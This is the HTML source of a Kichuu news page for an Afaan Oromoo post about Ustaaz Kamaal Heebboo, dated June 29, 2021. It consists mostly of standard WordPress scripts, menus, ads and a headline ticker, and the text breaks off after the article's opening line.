<!DOCTYPE html>
<html class="no-js mh-one-sb" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<script type="text/javascript">
!function(e){var n={};function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:r})},t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,n){if(1&n&&(e=t(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(t.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var o in e)t.d(r,o,function(n){return e[n]}.bind(null,o));return r},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=0)}([function(e,n,t){(function(e){!function(n){var t=n.ampUrl,r=n.isCustomizePreview,o=n.isAmpDevMode,i=n.noampQueryVarName,a=n.noampQueryVarValue,u=n.disabledStorageKey,s=n.mobileUserAgents,c=n.regexRegex;if("undefined"!=typeof sessionStorage){var f=new RegExp(c);if(s.some((function(e){var n=e.match(f);return!(!n||!new RegExp(n[1],n[2]).test(navigator.userAgent))||navigator.userAgent.includes(e)}))){e.addEventListener("DOMContentLoaded",(function(){var e=document.getElementById("amp-mobile-version-switcher");if(e){e.hidden=!1;var n=e.querySelector("a[href]");n&&n.addEventListener("click",(function(){sessionStorage.removeItem(u)}))}}));var d=o&&["paired-browsing-non-amp","paired-browsing-amp"].includes(window.name);if(!(sessionStorage.getItem(u)||r||d)){var l=new URL(location.href),p=new URL(t);p.hash=l.hash,l.searchParams.has(i)&&a===l.searchParams.get(i)?sessionStorage.setItem(u,"1"):p.href!==l.href&&(window.stop(),location.replace(p.href))}}}}({"ampUrl":"https:\/\/kichuu.com\/ustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira\/amp\/","noampQueryVarName":"noamp","noampQueryVarValue":"mobile","disabledStorageKey":"amp_mobile_redirect_disabled","mobileUserAgents":["Mobile","Android","Silk\/","Kindle","BlackBerry","Opera Mini","Opera Mobi"],"regexRegex":"^\\/((?:.|\n)+)\\/([i]*)$","isCustomizePreview":false,"isAmpDevMode":false})}).call(this,t(1))},function(e,n){var t;t=function(){return this}();try{t=t||new Function("return this")()}catch(e){"object"==typeof window&&(t=window)}e.exports=t}]);
</script>
<title>USTAAZ KAMAAL HEEBBOO: Akkanatti dirree gootaati bookkisaa jira. &#8211; Kichuu</title><style id="rocket-critical-css">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</style><link rel="preload" href="https://r7b3p6q7.rocketcdn.me/wp-content/cache/min/1/28aa4c142b66b4f601e283c35ccbfac4.css" data-rocket-async="style" as="style" onload="this.onload=null;this.rel='stylesheet'" media="all" data-minify="1" />
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//r7b3p6q7.rocketcdn.me' />
<link rel='dns-prefetch' href='//pagead2.googlesyndication.com' />
<link href='https://fonts.gstatic.com' crossorigin rel='preconnect' />
<link href='https://r7b3p6q7.rocketcdn.me' rel='preconnect' />
<link rel="alternate" type="application/rss+xml" title="Kichuu &raquo; Feed" href="https://kichuu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Kichuu &raquo; Comments Feed" href="https://kichuu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Kichuu &raquo; USTAAZ KAMAAL HEEBBOO: Akkanatti dirree gootaati bookkisaa jira. Comments Feed" href="https://kichuu.com/ustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira/feed/" />
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	



<link crossorigin="anonymous" rel='preload'   href='https://fonts.googleapis.com/css?family=Merriweather:300,400,400italic,600,700&#038;display=swap' data-rocket-async="style" as="style" onload="this.onload=null;this.rel='stylesheet'" type='text/css' media='all' />
<style id='rocket-lazyload-inline-css' type='text/css'>
.rll-youtube-player{position:relative;padding-bottom:56.23%;height:0;overflow:hidden;max-width:100%;}.rll-youtube-player iframe{position:absolute;top:0;left:0;width:100%;height:100%;z-index:100;background:0 0}.rll-youtube-player img{bottom:0;display:block;left:0;margin:auto;max-width:100%;width:100%;position:absolute;right:0;top:0;border:none;height:auto;cursor:pointer;-webkit-transition:.4s all;-moz-transition:.4s all;transition:.4s all}.rll-youtube-player img:hover{-webkit-filter:brightness(75%)}.rll-youtube-player .play{height:72px;width:72px;left:50%;top:50%;margin-left:-36px;margin-top:-36px;position:absolute;background:url(https://r7b3p6q7.rocketcdn.me/wp-content/plugins/wp-rocket/assets/img/youtube.png) no-repeat;cursor:pointer}
</style>
<script type='text/javascript' src='https://r7b3p6q7.rocketcdn.me/wp-includes/js/jquery/jquery.min.js?ver=3.5.1' id='jquery-core-js' defer></script>


<script data-rocketlazyloadscript='https://r7b3p6q7.rocketcdn.me/wp-content/cache/busting/1/gtm-c25d27ca5e57b0778ad463f501a16e44.js' data-no-minify="1" type='text/javascript'  id='google_gtagjs-js' async></script>
<script data-rocketlazyloadscript='data:text/javascript;base64,CndpbmRvdy5kYXRhTGF5ZXIgPSB3aW5kb3cuZGF0YUxheWVyIHx8IFtdO2Z1bmN0aW9uIGd0YWcoKXtkYXRhTGF5ZXIucHVzaChhcmd1bWVudHMpO30KZ3RhZygnc2V0JywgJ2xpbmtlcicsIHsiZG9tYWlucyI6WyJraWNodXUuY29tIl19ICk7Cmd0YWcoImpzIiwgbmV3IERhdGUoKSk7Cmd0YWcoInNldCIsICJkZXZlbG9wZXJfaWQuZFpUTmlNVCIsIHRydWUpOwpndGFnKCJjb25maWciLCAiVUEtNTgxNjYwOTUtMSIsIHsiYW5vbnltaXplX2lwIjp0cnVlfSk7Cg==' type='text/javascript' id='google_gtagjs-js-after'></script>
<link rel="https://api.w.org/" href="https://kichuu.com/wp-json/" /><link rel="alternate" type="application/json" href="https://kichuu.com/wp-json/wp/v2/posts/96649" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://kichuu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://r7b3p6q7.rocketcdn.me/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.7.2" />
<link rel="canonical" href="https://kichuu.com/ustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira/" />
<link rel='shortlink' href='https://kichuu.com/?p=96649' />
<meta name="generator" content="Site Kit by Google 1.35.0" /><style type="text/css">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</style>
<!--[if lt IE 9]>
<script src="https://kichuu.com/wp-content/themes/mh-magazine/js/css3-mediaqueries.js"></script>
<![endif]-->
<style type="text/css">
.entry-content { font-size: 13px; font-size: 0.8125rem; }
h1, h2, h3, h4, h5, h6, .mh-custom-posts-small-title { font-family: "Merriweather", serif; }
body { font-family: "Merriweather", serif; }
</style>
<style type="text/css" id="custom-background-css">
body.custom-background { background-color: #e5e4e2; }
</style>
	<link rel="amphtml" href="https://kichuu.com/ustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira/amp/"><script data-rocketlazyloadscript='//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js' async ></script><script>(adsbygoogle = window.adsbygoogle || []).push({"google_ad_client":"ca-pub-6953193962442323","enable_page_level_ads":true,"tag_partner":"site_kit"});</script><style>#amp-mobile-version-switcher{position:absolute;width:100%;left:0;z-index:100}#amp-mobile-version-switcher>a{display:block;padding:15px 0;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;color:#eaeaea;text-align:center;text-decoration:none;background-color:#444;border:0}#amp-mobile-version-switcher>a:active,#amp-mobile-version-switcher>a:focus,#amp-mobile-version-switcher>a:hover{text-decoration:underline}</style><link rel="alternate" type="text/html" media="only screen and (max-width: 640px)" href="https://kichuu.com/ustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira/amp/"><link rel="icon" href="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_icon1-2-150x150.png" sizes="32x32" />
<link rel="icon" href="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_icon1-2-300x300.png" sizes="192x192" />
<link rel="apple-touch-icon" href="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_icon1-2-300x300.png" />
<meta name="msapplication-TileImage" content="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_icon1-2-300x300.png" />
<noscript><style id="rocket-lazyload-nojs-css">.rll-youtube-player, [data-lazy-src]{display:none !important;}</style></noscript><script>
/*! loadCSS rel=preload polyfill. [c]2017 Filament Group, Inc. MIT License */
(function(w){"use strict";if(!w.loadCSS){w.loadCSS=function(){}}
var rp=loadCSS.relpreload={};rp.support=(function(){var ret;try{ret=w.document.createElement("link").relList.supports("preload")}catch(e){ret=!1}
return function(){return ret}})();rp.bindMediaToggle=function(link){var finalMedia=link.media||"all";function enableStylesheet(){link.media=finalMedia}
if(link.addEventListener){link.addEventListener("load",enableStylesheet)}else if(link.attachEvent){link.attachEvent("onload",enableStylesheet)}
setTimeout(function(){link.rel="stylesheet";link.media="only x"});setTimeout(enableStylesheet,3000)};rp.poly=function(){if(rp.support()){return}
var links=w.document.getElementsByTagName("link");for(var i=0;i<links.length;i++){var link=links[i];if(link.rel==="preload"&&link.getAttribute("as")==="style"&&!link.getAttribute("data-loadcss")){link.setAttribute("data-loadcss",!0);rp.bindMediaToggle(link)}}};if(!rp.support()){rp.poly();var run=w.setInterval(rp.poly,500);if(w.addEventListener){w.addEventListener("load",function(){rp.poly();w.clearInterval(run)})}else if(w.attachEvent){w.attachEvent("onload",function(){rp.poly();w.clearInterval(run)})}}
if(typeof exports!=="undefined"){exports.loadCSS=loadCSS}
else{w.loadCSS=loadCSS}}(typeof global!=="undefined"?global:this))
</script></head>
<body id="mh-mobile" class="post-template-default single single-post postid-96649 single-format-standard custom-background wp-custom-logo mh-boxed-layout mh-right-sb mh-loop-layout3 mh-widget-layout3 mh-header-transparent mh-loop-hide-caption" itemscope="itemscope" itemtype="https://schema.org/WebPage">
<div class="mh-container mh-container-outer">
<div class="mh-header-nav-mobile clearfix"></div>
	<div class="mh-preheader">
    	<div class="mh-container mh-container-inner mh-row clearfix">
							<div class="mh-header-bar-content mh-header-bar-top-left mh-col-2-3 clearfix">
											<nav class="mh-navigation mh-header-nav mh-header-nav-top clearfix" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
							<div class="menu-top_menu-container"><ul id="menu-top_menu" class="menu"><li id="menu-item-348" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-348"><a href="https://kichuu.com/category/business/">Business</a></li>
<li id="menu-item-769" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-769"><a href="https://kichuu.com/category/fun-videos/">Fun Videos</a></li>
<li id="menu-item-18338" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-18338"><a href="https://kichuu.com/category/photo-gallery/">Photo Gallery</a></li>
<li id="menu-item-12292" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12292"><a href="http://ayyaantuu.org">Ayyaantuu</a></li>
<li id="menu-item-21746" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21746"><a href="https://kichuu.com/category/chronicles-page/">Odaa Post</a></li>
<li id="menu-item-60450" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-60450"><a href="https://kichuu.com/contact-us/">Contact us</a></li>
</ul></div>						</nav>
									</div>
										<div class="mh-header-bar-content mh-header-bar-top-right mh-col-1-3 clearfix">
											<aside class="mh-header-search mh-header-search-top">
							<form role="search" method="get" class="search-form" action="https://kichuu.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>						</aside>
									</div>
					</div>
	</div>
<header class="mh-header" itemscope="itemscope" itemtype="https://schema.org/WPHeader">
	<div class="mh-container mh-container-inner clearfix">
		<div class="mh-custom-header clearfix">
<div class="mh-header-columns mh-row clearfix">
<div class="mh-col-1-3 mh-site-identity">
<div class="mh-site-logo" role="banner" itemscope="itemscope" itemtype="https://schema.org/Brand">
<a href="https://kichuu.com/" class="custom-logo-link" rel="home"><img width="331" height="81" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20331%2081'%3E%3C/svg%3E" class="custom-logo" alt="Kichuu" data-lazy-srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1.png 331w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1-300x73.png 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1-326x81.png 326w" data-lazy-sizes="(max-width: 331px) 100vw, 331px" data-lazy-src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1.png" /><noscript><img width="331" height="81" src="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1.png" class="custom-logo" alt="Kichuu" srcset="https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1.png 331w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1-300x73.png 300w, https://r7b3p6q7.rocketcdn.me/wp-content/uploads/2016/11/cropped-kichuu_headerlogo1-1-326x81.png 326w" sizes="(max-width: 331px) 100vw, 331px" /></noscript></a></div>
</div>
<aside class="mh-col-2-3 mh-header-widget-2">
<div id="custom_html-14" class="widget_text mh-widget mh-header-2 widget_custom_html"><div class="textwidget custom-html-widget"><script data-rocketlazyloadscript='https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js' async ></script>
<!-- kichuu2021-02-06-fixed -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-6953193962442323"
     data-ad-slot="5930196910"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside>
</div>
</div>
	</div>
	<div class="mh-main-nav-wrap">
		<nav class="mh-navigation mh-main-nav mh-container mh-container-inner clearfix" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
			<div class="menu-main_menu-container"><ul id="menu-main_menu" class="menu"><li id="menu-item-48174" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-48174"><a href="https://kichuu.com/">Home</a></li>
<li id="menu-item-140" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-140"><a href="https://kichuu.com/category/news/">News</a>
<ul class="sub-menu">
	<li id="menu-item-162" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-162"><a href="https://kichuu.com/category/news/africa/">Africa</a></li>
	<li id="menu-item-163" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-163"><a href="https://kichuu.com/category/news/world/">World</a></li>
</ul>
</li>
<li id="menu-item-18343" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-item-18343"><a href="https://kichuu.com/category/afaan-oromoo/">Afaan Oromoo</a>
<ul class="sub-menu">
	<li id="menu-item-18358" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18358"><a href="https://kichuu.com/category/afaan-oromoo/news-afaan-oromoo/">News</a></li>
	<li id="menu-item-18359" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18359"><a href="https://kichuu.com/category/afaan-oromoo/radio/">Radio</a></li>
	<li id="menu-item-18360" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18360"><a href="https://kichuu.com/category/afaan-oromoo/tv/">TV</a></li>
	<li id="menu-item-18362" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18362"><a href="https://kichuu.com/category/afaan-oromoo/videos/">Videos</a></li>
</ul>
</li>
<li id="menu-item-18351" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-18351"><a href="https://kichuu.com/category/amharic/">Amharic</a></li>
<li id="menu-item-18" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-18"><a href="https://kichuu.com/category/women/">Women</a>
<ul class="sub-menu">
	<li id="menu-item-231" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-231"><a href="https://kichuu.com/category/women/oromo/">Oromo</a></li>
	<li id="menu-item-232" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-232"><a href="https://kichuu.com/category/women/other-women/">Other women</a></li>
</ul>
</li>
<li id="menu-item-17" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17"><a href="https://kichuu.com/category/health/">Health</a></li>
<li id="menu-item-764" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-764"><a href="https://kichuu.com/category/musics/">Musics</a></li>
<li id="menu-item-350" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-350"><a href="https://kichuu.com/category/sports/">Sports</a></li>
</ul></div>		</nav>
	</div>
	</header>
	<div class="mh-subheader">
		<div class="mh-container mh-container-inner mh-row clearfix">
							<div class="mh-header-bar-content mh-header-bar-bottom-left mh-col-2-3 clearfix">
											<div class="mh-header-ticker mh-header-ticker-bottom">
							<div class="mh-ticker-bottom">
			<div class="mh-ticker-title mh-ticker-title-bottom">
			News Ticker<i class="fa fa-chevron-right"></i>		</div>
		<div class="mh-ticker-content mh-ticker-content-bottom">
		<ul id="mh-ticker-loop-bottom">				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/jaakoob-zuumaa-peresedaantiin-afrikaa-kibbaa-duranii-akka-hidhaman-murteen-darbe/" title="Jaakoob Zuumaa peresedaantiin Afrikaa Kibbaa duranii akka hidhaman murteen darbe">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ June 29, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Jaakoob Zuumaa peresedaantiin Afrikaa Kibbaa duranii akka hidhaman murteen darbe						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																News							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/an-uneasy-silence-from-ethiopia-and-eritrea-over-whats-next/" title="An uneasy silence from Ethiopia and Eritrea over what’s next.">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ June 29, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							An uneasy silence from Ethiopia and Eritrea over what’s next.						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Africa							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/oromiyaa-sagantaa-yaadannoo-hacaaluu-hundeessaatii-ambootti/" title="Oromiyaa: Sagantaa yaadannoo Hacaaluu Hundeessaatii Ambootti!">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ June 29, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Oromiyaa: Sagantaa yaadannoo Hacaaluu Hundeessaatii Ambootti!						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Videos							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/lawmaker-praises-ceasefire-in-ethiopia-but-raises-concerns-about-possible-genocide-in-tigray-region/" title="Lawmaker Praises Ceasefire In Ethiopia But Raises Concerns About Possible Genocide In Tigray Region">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ June 29, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Lawmaker Praises Ceasefire In Ethiopia But Raises Concerns About Possible Genocide In Tigray Region						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Videos							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/yaaddannoo-hacaaluu-amboo-tahe-fi-oddeefannoo-lola-tigraayin-miidhaa-pp-mudate/" title="Yaaddannoo Hacaaluu Amboo tahe fi Oddeefannoo Lola Tigraayin miidhaa PP mudate">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ June 29, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Yaaddannoo Hacaaluu Amboo tahe fi Oddeefannoo Lola Tigraayin miidhaa PP mudate						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Videos							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/ustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira/" title="USTAAZ KAMAAL HEEBBOO: Akkanatti dirree gootaati bookkisaa jira.">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ June 29, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							USTAAZ KAMAAL HEEBBOO: Akkanatti dirree gootaati bookkisaa jira.						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																News							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/dirre-dhawaa-biyya-yeroo-rakkoo-goota-oomishtee-oromoof-gad-kennaa-turte/" title="Dirre Dhawaa biyya yeroo rakkoo goota Oomishtee Oromoof gad kennaa turte">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ June 29, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Dirre Dhawaa biyya yeroo rakkoo goota Oomishtee Oromoof gad kennaa turte						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Videos							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/alert-situation-in-mekele/" title="Alert: Situation in Mekele">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ June 29, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Alert: Situation in Mekele						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																World							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/ethiopia-a-statement-by-unicef-said-ethiopian-national-defense-forces/" title="#Ethiopia: A statement by @UNICEF said Ethiopian National Defense Forces">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ June 29, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							#Ethiopia: A statement by @UNICEF said Ethiopian National Defense Forces						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																World							</span>
											</a>
				</li>				<li class="mh-ticker-item mh-ticker-item-bottom">
					<a href="https://kichuu.com/rebels-in-tigray-reject-calls-for-ceasefire-after-ethiopian-government-forces-withdraw-from-regional-capital/" title="Rebels in Tigray reject calls for ceasefire after Ethiopian government forces withdraw from regional capital">
						<span class="mh-ticker-item-date mh-ticker-item-date-bottom">
                        	[ June 29, 2021 ]                        </span>
						<span class="mh-ticker-item-title mh-ticker-item-title-bottom">
							Rebels in Tigray reject calls for ceasefire after Ethiopian government forces withdraw from regional capital						</span>
													<span class="mh-ticker-item-cat mh-ticker-item-cat-bottom">
								<i class="fa fa-caret-right"></i>
																Africa							</span>
											</a>
				</li>		</ul>
	</div>
</div>						</div>
									</div>
										<div class="mh-header-bar-content mh-header-bar-bottom-right mh-col-1-3 clearfix">
											<aside class="mh-header-search mh-header-search-bottom">
							<form role="search" method="get" class="search-form" action="https://kichuu.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>						</aside>
									</div>
					</div>
	</div>
<div class="mh-wrapper clearfix">
	<div class="mh-main clearfix">
		<div id="main-content" class="mh-content" role="main" itemprop="mainContentOfPage"><nav class="mh-breadcrumb" itemscope itemtype="http://schema.org/BreadcrumbList"><span itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a href="https://kichuu.com" itemprop="item"><span itemprop="name">Home</span></a><meta itemprop="position" content="1" /></span><span class="mh-breadcrumb-delimiter"><i class="fa fa-angle-right"></i></span><a href="https://kichuu.com/category/afaan-oromoo/">Afaan Oromoo</a><span class="mh-breadcrumb-delimiter"><i class="fa fa-angle-right"></i></span><span itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a href="https://kichuu.com/category/afaan-oromoo/news-afaan-oromoo/" itemprop="item"><span itemprop="name">News</span></a><meta itemprop="position" content="2" /></span><span class="mh-breadcrumb-delimiter"><i class="fa fa-angle-right"></i></span>USTAAZ KAMAAL HEEBBOO: Akkanatti dirree gootaati bookkisaa jira.</nav>
<article id="post-96649" class="post-96649 post type-post status-publish format-standard has-post-thumbnail hentry category-news-afaan-oromoo">
	<header class="entry-header clearfix"><h1 class="entry-title">USTAAZ KAMAAL HEEBBOO: Akkanatti dirree gootaati bookkisaa jira.</h1><div class="mh-meta entry-meta">
<span class="entry-meta-date updated"><i class="fa fa-clock-o"></i><a href="https://kichuu.com/2021/06/">June 29, 2021</a></span>
</div>
	</header>
	<div id="custom_html-15" class="widget_text mh-widget mh-posts-1 widget_custom_html"><div class="textwidget custom-html-widget"><script data-rocketlazyloadscript='https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js' async ></script>
<!-- kichuu20210131-2h -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6953193962442323"
     data-ad-slot="4616959710"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div>	<div class="entry-content clearfix"><div class="mh-social-top">
<div class="mh-share-buttons clearfix">
	<a class="mh-facebook" href="#" onclick="window.open('https://www.facebook.com/sharer.php?u=https%3A%2F%2Fkichuu.com%2Fustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira%2F&t=USTAAZ+KAMAAL+HEEBBOO%3A+Akkanatti+dirree+gootaati+bookkisaa+jira.', 'facebookShare', 'width=626,height=436'); return false;" title="Share on Facebook">
		<span class="mh-share-button"><i class="fa fa-facebook"></i></span>
	</a>
	<a class="mh-twitter" href="#" onclick="window.open('https://twitter.com/share?text=USTAAZ+KAMAAL+HEEBBOO%3A+Akkanatti+dirree+gootaati+bookkisaa+jira.:&url=https%3A%2F%2Fkichuu.com%2Fustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira%2F', 'twitterShare', 'width=626,height=436'); return false;" title="Tweet This Post">
		<span class="mh-share-button"><i class="fa fa-twitter"></i></span>
	</a>
	<a class="mh-linkedin" href="#" onclick="window.open('https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fkichuu.com%2Fustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira%2F&source=', 'linkedinShare', 'width=626,height=436'); return false;" title="Share on LinkedIn">
		<span class="mh-share-button"><i class="fa fa-linkedin"></i></span>
	</a>
	<a class="mh-pinterest" href="#" onclick="window.open('https://pinterest.com/pin/create/button/?url=https%3A%2F%2Fkichuu.com%2Fustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira%2F&media=https://kichuu.com/wp-content/uploads/2021/06/pizap16-1-e1625008937608.jpg&description=USTAAZ+KAMAAL+HEEBBOO%3A+Akkanatti+dirree+gootaati+bookkisaa+jira.', 'pinterestShare', 'width=750,height=350'); return false;" title="Pin This Post">
		<span class="mh-share-button"><i class="fa fa-pinterest"></i></span>
	</a>
	<a class="mh-email" href="mailto:?subject=USTAAZ%20KAMAAL%20HEEBBOO%3A%20Akkanatti%20dirree%20gootaati%20bookkisaa%20jira.&amp;body=https%3A%2F%2Fkichuu.com%2Fustaaz-kamaal-heebboo-akkanatti-dirree-gootaati-bookkisaa-jira%2F" title="Send this article to a friend" target="_blank">
		<span class="mh-share-button"><i class="fa fa-envelope-o"></i></span>
	</a>
	<a class="mh-print" href="javascript:window.print()" title="Print this article">
		<span class="mh-share-button"><i class="fa fa-print"></i></span>
	</a>
</div></div>
<div class="kvgmc6g5 cxmmr5t8 oygrvhab hcukyx3x c1et5uql ii04i59q">
<div dir="auto"><strong>USTAAZ KAMAAL HEEBBOO</strong></div>
